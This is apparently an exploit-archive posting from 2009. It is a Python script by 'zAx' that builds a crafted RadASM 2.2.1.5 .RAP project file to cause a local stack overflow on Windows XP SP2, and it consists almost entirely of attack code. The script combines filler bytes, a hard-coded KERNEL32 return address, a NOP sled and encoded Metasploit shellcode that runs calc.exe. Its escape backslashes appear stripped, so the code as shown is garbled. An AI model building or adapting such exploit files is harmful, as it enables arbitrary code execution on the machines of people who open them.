radasm-overflow.txt
Posted on 10 March 2009
#!/usr/bin/python # RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit # Exploited By : zAx # Discovered and Idea By : Encrypt3d.M!nd # Tested On : Windows XP ServicePack 2 English. # Thanks to : All My Friends. print " RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit" print " Written By : zAx" print " Contact : ThE-zAx@Hotmail.Com" header = "[Project] Assembler=masm Group=1 GroupExpand=1 [Files] 1=" zAx = "c4ca4238a0b923820dcc509a6f75849bc81e728d9d4c2f636f067f89cc14862ceccbc87e4b5ce2fe28308fd9f2a7baf3a87ff679a2f3e71d9181a67b7542122ce4da3b7fbbce2345d7772b0674a318d51679091c5a880faf6fb5e6087eb1b2dc8f14e45fceea167a5a36dedd4bea2543c9" eip = "x5Dx38x82x7C" # KERNEL32.DLL ESP In Windows SP2 EN nopsled = "x90"*20 #win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com shellcode = ( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34" "x42x50x42x30x42x30x4bx58x45x54x4ex43x4bx48x4ex57" "x45x50x4ax47x41x30x4fx4ex4bx58x4fx34x4ax31x4bx38" "x4fx45x42x42x41x30x4bx4ex49x54x4bx58x46x53x4bx48" "x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c" "x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx33x46x45x46x32x46x50x45x57x45x4ex4bx58" "x4fx45x46x52x41x50x4bx4ex48x36x4bx48x4ex50x4bx44" "x4bx48x4fx45x4ex51x41x50x4bx4ex4bx58x4ex51x4bx48" "x41x30x4bx4ex49x38x4ex35x46x52x46x30x43x4cx41x53" "x42x4cx46x56x4bx48x42x54x42x53x45x58x42x4cx4ax37" "x4ex50x4bx58x42x44x4ex30x4bx48x42x57x4ex51x4dx4a" "x4bx48x4ax46x4ax50x4bx4ex49x50x4bx58x42x38x42x4b" "x42x50x42x30x42x50x4bx38x4ax46x4ex53x4fx45x41x43" "x48x4fx42x56x48x55x49x38x4ax4fx43x48x42x4cx4bx47" "x42x55x4ax36x42x4fx4cx58x46x50x4fx45x4ax46x4ax59" "x50x4fx4cx48x50x50x47x55x4fx4fx47x4ex43x56x41x36" "x4ex46x43x46x50x42x45x46x4ax47x45x36x42x30x5a" ) stack = header + zAx + eip + nopsled + shellcode + nopsled file=open("zAx.rap","w") file.write(stack) file.close() raw_input(" Exploit file created!, Now Go to RadASM and Open Our Devil Project :D ")
